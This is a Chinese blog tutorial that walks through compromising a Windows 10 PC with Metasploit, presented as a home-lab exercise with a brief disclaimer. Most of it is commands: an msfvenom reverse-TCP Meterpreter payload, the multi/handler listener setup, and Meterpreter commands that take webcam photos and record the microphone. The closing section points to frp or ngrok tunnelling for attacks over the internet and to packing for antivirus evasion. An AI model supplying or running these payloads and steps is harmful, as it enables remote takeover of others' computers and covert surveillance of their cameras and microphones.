Kali Linux-Metasploit入侵Windows10系统

Kali Linux-Metasploit入侵Windows10

写在前文
距离上一次写KALI黑客攻防的博文已是去年这个时候了
之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现

免责声明
切勿根据本文做违法之事,如做违法之事皆于博主本人无关!

实验环境
以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机
上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便
因此之后的截图是在一台物理机上的。

  • KALI:(攻击方)
    镜像版本:kali-linux-2019.2-amd64.iso
    (这个系统可以直接装在实体机上或者装在VM虚拟机上,如果装在虚拟机上要配置网卡为桥接模式,配置为桥接模式的作用是使虚拟机类似于一台实体机,并且和宿主机在在同一个内网网段中,IP是由路由器DHCP统一分配的)
    IP:192.168.1.121(IP由DHCP自动分配,每个人都有所不同,也可设置为静态IP)
  • Windows10:(被攻击方)
    系统版本:无要求(家庭版或专业版都可)
    IP:192.168.1.120(IP由DHCP自动分配,每个人都有所不同,也可设置为静态IP)

实验目的
本实验的最终目的很简单,就是入侵被攻击电脑拿到Shell,操作被攻击电脑。

先决条件
首先要保证这处在同一网段中的两个试验机要PING通
PING不同的话记得关闭Windows10(被攻击方)的防火墙
(文末讲解不处于同一网段的方法以及后门程序免杀的一些技巧)

开始实验
步骤一:在Kali Linux中生成被控端

用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.1.121”(KALI),连接的端口为“5000”(端口可以任意),生成的文件为payload.exe,在/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.121 lport=5000 -f exe -o /root/payload.exe

更多关于msfvenom生成payload的可以查看这篇博客
https://www.cnblogs.com/BOHB-yunying/p/11628896.html
在这里插入图片描述
生成反向控制程序如下
在这里插入图片描述
把这个文件移动到Windows系统中
注意如果直接从虚拟机往宿主机中拖入没有反应或者拖入不了的话记得安装VMwareTools
安装很容易,这里就不多做介绍了
在这里插入图片描述
步骤二:在Kali Linux中启动主控端(msfconsole命令)
输入msfconsole命令启动Metasploit工具

msfconsole

在这里插入图片描述

在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下,启动命令如下

use exploit/multi/handler

在这里插入图片描述
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

在这里插入图片描述
设置一个lhost和lport

set lhost 192.168.1.121
set lport 5000

在这里插入图片描述
执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处
如果被控端打开了前面我们传过去的控制木马,监听端会有如下显示
在这里插入图片描述
步骤三:开始操作被控端
查看文件
在这里插入图片描述
操控摄像头

webcam_list
webcam_snap -i 2 flase

webcam_list:
列出目标系统上所有网络摄像头列表,按数量编号
webcam_snap可能有参数:
-h:显示帮助。
-i :要使用的网络摄像头的索引号。
-p :JPEG图像文件路径。默认为HOME / [随机乱码名字] .jpeg
-q :JPEG图像质量,默认为“50”。
-v :自动查看JPEG图像,默认为“true”。
注意:我的宿主机windows的摄像头编号是2,因此下面加了-i参数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

录音

record_mic -d 8

record_mic可能有参数:
-h:显示帮助。
-d :记录的秒数,默认为1秒
-F :wav文件路径。默认为HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”。
在这里插入图片描述
CSDN不支持音频上传就不传录的声音了
由于时间原因就不做过多的参数测试了
附上更多meterpreter的操作
https://www.cnblogs.com/backlion/p/9484949.html

写在文末
本篇相当于是在内网环境下做的实验,很多人想知道如何通过外网做这样类似的实验,其实这个问题很简单,仔细观察我上面的IP就可以得出只需搭建frp或者ngrok之类的做个内网穿透即可。或者说你有公网服务器的话直接在公网上搭建Metasploit攻击即可。
我自己就不搭建了,放上一个感觉可行的网页(ngrok),不过内网穿透我感觉还是frp好用点。
https://www.freebuf.com/sectool/162046.html
针对于如何防止防火墙发现我们的后门程序,这个是稍微有点难度的,不过也可以做,只需要给程序加壳或者编写一些花指令。同样我也不做过多操作,免得被请去喝茶,下面给出一篇相关链接,不一定能完美避过杀毒软件,这只需要经过一段时间的尝试和测试是可以编写出来的。
https://www.cnblogs.com/ghost00011011/p/7994396.html
相关链接
入侵安卓手机,这篇文章是一年前的这个时候写的,排版什么的不是很好,但是应该是有用的。
Kali Linux-Metasploit入侵Android手机

THE END
THANKS!

猜你喜欢

转载自blog.csdn.net/qq_40695642/article/details/107707837
今日推荐